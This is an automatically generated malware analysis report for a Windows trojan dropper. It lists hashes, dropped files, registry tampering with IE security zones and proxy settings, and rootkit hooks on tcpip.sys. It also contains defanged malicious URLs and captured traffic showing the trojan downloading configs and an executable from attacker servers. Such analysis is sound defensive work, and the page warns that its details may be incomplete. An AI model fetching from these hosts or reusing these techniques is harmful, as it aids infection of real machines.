Gen.Variant.Graftor.104958_1029a36935

by malwarelabrobot on April 7th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Flystud.d (Kaspersky), Gen:Variant.Graftor.104958 (B) (Emsisoft), Gen:Variant.Graftor.104958 (AdAware), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 1029a3693577a20f33abe5e8b6dae06f
SHA1: f136cccde3e38a4629a5487bb9489be5189fb22d
SHA256: 2e35362b419de4f52e1ee9ff9f863810e62ec540ea7026adc55e046c2cebbc38
SSDeep: 49152:Av4hcI6DRlQRAt8Rxhwp3ijLsTQpsvD/DX y4onCYDoD5:2I79wp4yOsvD/D donCYUV
Size: 2070410 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: TODO:
Created at: 2000-05-19 13:11:55
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1612
bv.exe:464
7048ico.exe:1096
comdhost.exe:424

The Trojan injects its code into the following process(es):

300084.exe:256

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\E_4\krnln.fnr (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smss.exe (6435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bv.exe (1784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\E_4\shell.fne (57 bytes)

The process bv.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\byteFirewall.dat (253 bytes)

The process 7048ico.exe:1096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\2015040604\userconfig.ini (22 bytes)
%WinDir%\2015040604\config.ini (22 bytes)
%WinDir%\2015040604\svchost.exe (2105 bytes)
%System%\filelog.dat (24 bytes)

The process comdhost.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\fsq.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mssrv.exe (38495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\config[1].xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\nclound32.zip (78548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\config.ini (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\common[1].zip (196738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\plusconfig.xml (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjt_qt.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\brocount.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\kjqt[1].zip (5979 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\svchost.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\kjqt.zip (3945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\mp.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appboot.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lockmp.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\FC[1].zip (7311 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\TT2[1].zip (34919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MainCtrl[1].xml (2457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\FC.zip (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\FC.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\nclound32[1].zip (124172 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\TT2.zip (17429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\mainpage32[1].zip (14971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\AplusFile.bt (1136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\kjtqt.exe (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\lsass.exe (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\mainpage32.zip (5733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\downt\common.zip (130989 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (1701 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\appeight.exe (56684 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\ProjPack.xml (0 bytes)

Registry activity

The process %original file name%.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 0E B0 DC C8 12 71 5E 22 5F DE A4 C4 DB 6E 18"

The process bv.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 7A E7 B2 35 A7 1B F5 B9 E2 38 71 F4 CE 77 8E"

The process 7048ico.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 FC 3D 27 FF 85 4F 32 EA 27 29 91 3B 95 74 79"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\2015040604]
"svchost.exe" = "2015"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process comdhost.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 34 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 CF 63 BA 05 25 F3 2A A9 71 B2 1B 40 3E 92 F7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
97c8fe752e354b2945e4c593a87e4a8b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\krnln.fnr
d63851f89c7ad4615565ca300e8b8e27 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_4\shell.fne
11696f334778bda9231aa6b72bbcdaf7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\E_N4\krnln.fnr
bfa0b913e4067706b8f2746d51caac44 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bv.exe
3ed32c6b3a6794a7ee6223aef4670b5d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\smss.exe
cf0611524894bb6d0a64a8e157846efd c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\comdhost.exe
4de3914c7921c9d382d5d73ffc5f55cb c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\{8E418BF4-4A70-45ce-BDE7-9E28D88292DD}\msvcr32.dll
1ddf4cc1188804e8670e9ca6139c2fed c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\szicoad[1].exe
103909a23b5ac9774471b315d373fc06 c:\WINDOWS\2015040604\TCP-2015040604.dll
1ddf4cc1188804e8670e9ca6139c2fed c:\WINDOWS\2015040604\svchost.exe
14e87fff8fa466a7b829c65cc12fb35f c:\WINDOWS\system\7048ico.exe
33579f370aeb1237a9282b51eacb6d34 c:\WINDOWS\system\svchost.exe
fa682e642f66964cfddaa86b938d6694 c:\byteFirewall.dat

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\C:\byteFirewall.dat" the Trojan substitutes IRP handlers to control devices of tcpip.sys driver:

MJ_CREATE
MJ_CREATE_NAMED_PIPE
MJ_CLOSE
MJ_READ
MJ_WRITE
MJ_QUERY_INFORMATION
MJ_SET_INFORMATION
MJ_QUERY_EA
MJ_SET_EA
MJ_FLUSH_BUFFERS
MJ_QUERY_VOLUME_INFORMATION
MJ_SET_VOLUME_INFORMATION
MJ_DIRECTORY_CONTROL
MJ_FILE_SYSTEM_CONTROL
MJ_DEVICE_CONTROL
MJ_INTERNAL_DEVICE_CONTROL
MJ_SHUTDOWN
MJ_LOCK_CONTROL
MJ_CLEANUP
MJ_CREATE_MAILSLOT
MJ_QUERY_SECURITY
MJ_SET_SECURITY
MJ_POWER
MJ_SYSTEM_CONTROL
MJ_DEVICE_CHANGE
MJ_QUERY_QUOTA
MJ_SET_QUOTA

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 19868 20480 4.51528 15c1f09b5a84212473d3312136f61984
.rdata 24576 2634 4096 2.46987 c3a429c9401d144a06bbf6c66f26e739
.data 28672 8024 8192 1.98312 391dfe9979de8fe0fe40df3f14303242
.ecode 36864 4096 4096 3.11561 dd0555631ceaf30c86b63ebb73afd81f
.rsrc 40960 928 4096 1.08643 654c64e0942f056dece224a875c0f5c8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ipaddress.wb916.com/IP.aspx 180.97.81.86
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a767.g.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://oss-cn-beijing-sandbox-2.ossuser.aliyuncs.com/server/server.txt
hxxp://cdct.zhdns.net/proj/BackEnd.ini
hxxp://cdct.zhdns.net/m137390001.xml
hxxp://ddkj04.oss-cn-hangzhou.aliyuncs.com/updata/adclient/client/szicoad.exe
hxxp://cdct.zhdns.net/proj/BackEnd32.zip
hxxp://cdct.zhdns.net/config.xml
hxxp://cdct.zhdns.net/proj/MainCtrl.xml
hxxp://pubyun.s.3322.net/dyndns/getip
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 87.245.221.113
hxxp://domain.awangba.com.cn/proj/MainCtrl.xml 58.218.211.249
hxxp://domain.awangba.com.cn/proj/BackEnd.ini 58.218.211.249
hxxp://down04.kuaibu8.com/updata/adclient/client/szicoad.exe 112.124.219.90
hxxp://www.3322.org/dyndns/getip 118.184.176.15
hxxp://down.awangba.com.cn/proj/BackEnd32.zip 122.226.181.115
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 87.245.221.113
hxxp://user.awangba.com.cn/m137390001.xml 122.226.102.76
hxxp://domain.awangba.com.cn/config.xml 58.218.211.249
hxxp://gengxin.kuaibu8.com/server/server.txt 182.92.18.11
tongji.wangbax.cn 115.28.38.37
www.kuaibu8.com 180.97.81.86


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET DNS DNS Query for Suspicious .com.cn Domain
ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 20 Feb 2015 20:14:50 GMT
Accept-Ranges: bytes
ETag: "05934e1494dd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10437
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
1401D04D49E16F8687....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Feb 2015 00:36:45 GMT
Accept-Ranges: bytes
ETag: "804c50f7c94fd01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 49859
Cache-Control: max-age=10786
Date: Mon, 06 Apr 2015 01:53:24 GMT
Connection: keep-alive
X-CCC: ES
X-CID: 2
MSCF............,...................I.......#.........WFw. .authroot.s
tl.....08..CK...<.......m..dK.......D.d'....fW...RJe.).."...n.Ie.,E
.RH...L....\...z.^...p.<g.9...~...=.d/.. ...H....8f|&x.N.d..p(....(
[email protected](.p`d. .....D.....g%.j..w.DF..GW .....*.@6....#.8....
v..=T..^.G.G.!.A........_...r..3n...G.g\_.r.....Au..sw.3.....G.f. ..0.
.0.^.R".K|.....y...l..1.......t.(...0Y......4.,......x..ENY.`d..O.....
!..9A~....^[email protected][email protected].).|.H.
..A.[.Q. D`.}YQvx.B`b.=....,X...-.5S..N..=x.....C.Mj^.H....5b...5.....
...I...`..... ..l.n.:.....j...u2gA.hx.`%K.bw...\!o.........R....=..*..
.w..J....q.?^.PuA..W...>.._..O......9|.../......m.E.u.d...J2.U.e?..
..}h.S.zC^...<.c)...^c.b}.2..'X567.!.h. ......5.......S*.z%..%..e..
.R...C#p..k.[...3...jI.<.Z.GX.u.- ....ut{.&>...:.......f...f.)y.
....5.../R.b.......r.!.4.-a.....!...P......Q'7.0.%[.~m_..v....;..:.X..
~...,.......O....u|T.L....w....)5.bBs..W..r..u.......W......'G......y.
..h.. %. z?..............f.Nx./c...R...`..y.>....'......l=.O..#....
..... ..P..Q.......3.............M......%...v.:(...u..zU......G_.<u
e...F.....6Xo......P.......@L#........4<....K.g:...3o.N..:..zb...5.
.,.5...C... .4..`Q0.....$9./.$1....WL)$.0F......^..k..D.*.#.L3. (}.,,.
kd.<W.....[,.....Y.n.b.....4.Y)...c.g..`.y.........X..I? '.{Cb.GDh.
d..F..2B...sT.^..!.L..}.P....C...?.......~.....d....5.j...1.y9^_K..g..
pX.......^z.e)....yc......?..o...e......KJ..H.O..m......B27....?.~m ..
[email protected](....f1...h.0.u4..(.........2b`....]..H.Ja..
<<< skipped >>>


GET /config.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 617
Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 08:32:08 GMT
ETag: "54bf5c75-269"
Age: 62667
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<Config>..    <
UpUrl>..        <MainPageID></MainPageID>..        <
ycgg>*.059jxw.com@*.777tttkkk.com@*.changduanxue.com@*.jia665511.co
m@*.okok77889.com</ycgg>..    </UpUrl>...<BlackUrl>a
bout:Tabs@about:blank@file:*@*.shunwang.com*@*.google.com*@*.baidu.com
*@*.gov.cn@*[email protected]@*.yxeram.org@*.yxera.org@*.yxera.ne
[email protected].*@*gonggao.icafe8.net*@*xd.xoyo.com*</BlackUrl>...<
OutGameUrl>hXXp://tz.awangba.com.cn/uimg1.htm@hXXp://VVV.baidu.com@
hXXp://VVV.sina.com@hXXp://VVV.163.com</OutGameUrl>...<TestUs
er>*</TestUser>...<MainPageWhite></MainPageWhite>
..</Config>..HTTP/1.0 200 OK..Content-Type: text/xml; charset=ut
f-8..Content-Length: 617..Last-Modified: Wed, 21 Jan 2015 07:59:49 GMT
..Accept-Ranges: bytes..Server: nginx..Date: Sun, 05 Apr 2015 08:32:08
 GMT..ETag: "54bf5c75-269"..Age: 62667..X-Cache: HIT from ctjsxzs1..Vi
a: 1.0 ctjsxzs1 (squid)..Connection: keep-alive..<?xml version="1.0
" encoding="UTF-8"?>..<Config>..    <UpUrl>..        &l
t;MainPageID></MainPageID>..        <ycgg>*.059jxw.com@
*.777tttkkk.com@*.changduanxue.com@*.jia665511.com@*.okok77889.com<
/ycgg>..    </UpUrl>...<BlackUrl>about:Tabs@about:blank
@file:*@*.shunwang.com*@*.google.com*@*.baidu.com*@*.gov.cn@*.58qh.com
@111.113.6.21@*.yxeram.org@*.yxera.org@*[email protected].*@*gonggao.
icafe8.net*@*xd.xoyo.com*</BlackUrl>...<OutGameUrl>htt
<<< skipped >>>

GET /proj/MainCtrl.xml HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: domain.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: 4337
Last-Modified: Fri, 03 Apr 2015 03:12:39 GMT
Accept-Ranges: bytes
Server: nginx
Date: Sun, 05 Apr 2015 05:05:29 GMT
ETag: "551e0527-10f1"
Age: 75067
X-Cache: HIT from ctjsxzs1
Via: 1.0 ctjsxzs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<FileDown>...<i
tem name="common" type="Common">....<sys type="all">.....<
file>common.zip</file>.....<down>hXXp://down.awangba.co
m.cn/proj/common.zip</down>.....<md5>116C3295FF8726952963A
5774637B309</md5>.....<param>appboot.exe</param>....
</sys>...</item>......<item name="new" type="SGTS">.
...<sys type="x86">.....<file>sgts.zip</file>.....&l
t;down>hXXp://down.awangba.com.cn/proj/sgts.zip</down>.....&l
t;md5>FC538737F7D79ACB274CE860194614A3</md5>.....<param>
;sgts.exe</param>....</sys>...</item>...<item nam
e="gda" type="GDA">....<sys type="x86">.....<file>PtsGP
U32.zip</file>.....<down>hXXp://down.awangba.com.cn/proj/P
tsGPU32.zip</down>.....<md5>6556006F549C0AE154AE60694D5242
E2</md5>.....<param>PtsGPU.exe</param>....</sys&g
t;....<sys type="x64">.....<file>PtsGPU64.zip</file>
.....<down>hXXp://down.awangba.com.cn/proj/PtsGPU64.zip</down
>.....<md5>AA9328656593D9D174CC5BDF07687807</md5>.....&
lt;param>PtsGPU.exe</param>....</sys>...</item>..
    ...<item name="neda,eda,ChannelEda" type="EDA">....<sys t
ype="x86">.....<file>nclound32.zip</file>.....<down&
gt;hXXp://down.awangba.com.cn/proj/nclound32.zip</down>.....<
md5>41FE0E8A5A889DB45241081868D75407</md5>.....<param&
<<< skipped >>>


GET /m137390001.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: user.awangba.com.cn
Connection: Keep-Alive


HTTP/1.0 200 OK
Server: nginx
Date: Fri, 27 Mar 2015 20:46:54 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 462
Last-Modified: Fri, 27 Mar 2015 09:41:55 GMT
ETag: "551525e3-1ce"
Accept-Ranges: bytes
Age: 70720
X-Cache: HIT from ctzjjhs1
Via: 1.0 ctzjjhs1 (squid)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>.<UserInfo autoPlayTime
="20141130">.  <item type="10511">.    <MainPageID>sg78
44</MainPageID>.    <OutGameID/>.    <OutGame2ID>100
412</OutGame2ID>.    <OutGame3ID/>.    <SGTPID/>.   
 <eda>108611</eda>.    <gda/>.    <BlackUrl/>.
    <f>0</f>.    <s>0</s>.    <q>1</q
>.    <c>1</c>.    <d>1</d>.    <area>
;dt_one</area>.    <ycgg>100412</ycgg>.    <cq>
;1</cq>.    <kjqt>300084</kjqt>.    <dbt>10041
2</dbt>.  </item>.</UserInfo>.HTTP/1.0 200 OK..Serve
r: nginx..Date: Fri, 27 Mar 2015 20:46:54 GMT..Content-Type: text/xml;
 charset=utf-8..Content-Length: 462..Last-Modified: Fri, 27 Mar 2015 0
9:41:55 GMT..ETag: "551525e3-1ce"..Accept-Ranges: bytes..Age: 70720..X
-Cache: HIT from ctzjjhs1..Via: 1.0 ctzjjhs1 (squid)..Connection: keep
-alive..<?xml version="1.0" encoding="UTF-8"?>.<UserInfo auto
PlayTime="20141130">.  <item type="10511">.    <MainPageID
>sg7844</MainPageID>.    <OutGameID/>.    <OutGame2I
D>100412</OutGame2ID>.    <OutGame3ID/>.    <SGTPID/
>.    <eda>108611</eda>.    <gda/>.    <BlackU
rl/>.    <f>0</f>.    <s>0</s>.    <q>
;1</q>.    <c>1</c>.    <d>1</d>.    <
;area>dt_one</area>.    <ycgg>100412</ycgg>. 
<<< skipped >>>


GET /IP.aspx HTTP/1.1
User-Agent: AutoIt
Host: ipaddress.wb916.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 06 Apr 2015 01:53:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49
[......]........=37.57.16.189........=...........HTTP/1.1 200 OK..Date
: Mon, 06 Apr 2015 01:53:43 GMT..Server: Microsoft-IIS/6.0..X-Powered-
By: ASP.NET..X-AspNet-Version: 4.0.30319..Cache-Control: private..Cont
ent-Type: text/html; charset=utf-8..Content-Length: 49..[......]......
..=37.57.16.189........=.............



GET /updata/adclient/client/szicoad.exe HTTP/1.1
Range: bytes=0-
Unless-Modified-Since: Fri, 27 Mar 2015 18:31:32 GMT
If-Range: "1DDF4CC1188804E8670E9CA6139C2FED"
User-Agent: AutoIt
Host: down04.kuaibu8.com


HTTP/1.1 206 Partial Content
Date: Mon, 06 Apr 2015 01:53:35 GMT
Content-Type: application/x-msdownload
Content-Length: 389558
Connection: close
Accept-Ranges: bytes
Content-Range: bytes 0-389557/389558
ETag: "1DDF4CC1188804E8670E9CA6139C2FED"
Last-Modified: Fri, 27 Mar 2015 18:31:32 GMT
Server: AliyunOSS
x-oss-request-id: 5521E71F957EEBB6599ED681
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......9jUt}.;'}.;'
}.;'.E.'..;'f..'..;'f..'H.;'ts.'t.;'ts.'\.;'}.:'j.;'f..'7.;'f..'J.;'f.
.'|.;'}..'|.;'f..'|.;'Rich}.;'........................PE..L....z.O....
......#.......... ...`[email protected]... ....@..........................@....
............@.......@.............................. ..................
......................................................................
......................UPX0.....`..............................UPX1....
[email protected].... ... ......................@.
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.08.UPX!....!|..wP......<.......&..S...............F......!
g?....*v V3.......$=.G....Q....rF...;w.r.^..



GET /proj/BackEnd.ini HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
